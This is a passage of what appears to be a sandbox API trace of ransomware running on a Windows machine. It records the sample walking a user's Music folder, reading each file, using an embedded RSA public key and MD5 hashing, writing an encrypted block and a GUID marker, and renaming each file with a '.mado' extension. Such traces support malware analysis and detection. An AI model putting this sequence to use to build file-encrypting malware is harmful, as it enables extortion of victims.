KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.360] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.361] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.361] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.361] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.361] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.361] GetLastError () returned 0x0 [0204.361] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.361] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.361] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.361] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.361] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.362] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.362] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x167ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.362] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.363] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.363] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.363] CloseHandle (hObject=0x63c) returned 1 [0204.364] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d6LmHhUS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d6lmhhus.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d6LmHhUS.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d6lmhhus.wav.mado")) returned 1 [0204.365] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.365] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0204.365] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb60c520, ftCreationTime.dwHighDateTime=0x1d5e5f8, ftLastAccessTime.dwLowDateTime=0x9977aa40, ftLastAccessTime.dwHighDateTime=0x1d5dbce, ftLastWriteTime.dwLowDateTime=0x9977aa40, ftLastWriteTime.dwHighDateTime=0x1d5dbce, nFileSizeHigh=0x0, nFileSizeLow=0x7a8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dmm6A.wav", cAlternateFileName="")) returned 1 [0204.365] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dmm6A.wav") returned=".wav" [0204.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dmm6A.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dmm6a.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.367] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=31372) returned 1 [0204.367] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.369] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7a66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.369] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.371] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x7a8c, lpOverlapped=0x0) returned 1 [0204.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.372] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.372] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.372] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.372] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.372] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.372] GetLastError () returned 0x0 [0204.373] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.373] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.373] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.373] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.373] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.373] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.373] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7a8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.373] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.374] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.374] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.374] CloseHandle (hObject=0x63c) returned 1 [0204.375] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dmm6A.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dmm6a.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dmm6A.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dmm6a.wav.mado")) returned 1 [0204.376] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x526a4560, ftCreationTime.dwHighDateTime=0x1d5e45f, ftLastAccessTime.dwLowDateTime=0xffbde220, ftLastAccessTime.dwHighDateTime=0x1d5dbdc, ftLastWriteTime.dwLowDateTime=0xffbde220, ftLastWriteTime.dwHighDateTime=0x1d5dbdc, nFileSizeHigh=0x0, nFileSizeLow=0x66da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOiLiV5lxF.wav", cAlternateFileName="DOILIV~1.WAV")) returned 1 [0204.376] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DOiLiV5lxF.wav") returned=".wav" [0204.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DOiLiV5lxF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\doiliv5lxf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.377] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=26330) returned 1 [0204.377] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.379] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x66b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.379] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.381] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x66da, lpOverlapped=0x0) returned 1 [0204.381] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.382] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.382] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.382] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.382] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.382] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.382] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.383] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.383] GetLastError () returned 0x0 [0204.383] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.383] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.383] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.383] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.383] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x66e0) returned 0x3b74b68 [0204.383] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6ea68 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1f0 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6eab0 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe208 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe238 [0204.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe250 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.384] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b250 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe238 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe250 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b250 | out: hHeap=0x2c0000) returned 1 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe250 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe238 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bc98 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bdb0 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe250 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe238 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.385] GetCurrentThreadId () returned 0x600 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71750 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.385] GetCurrentThreadId () returned 0x600 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe238 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 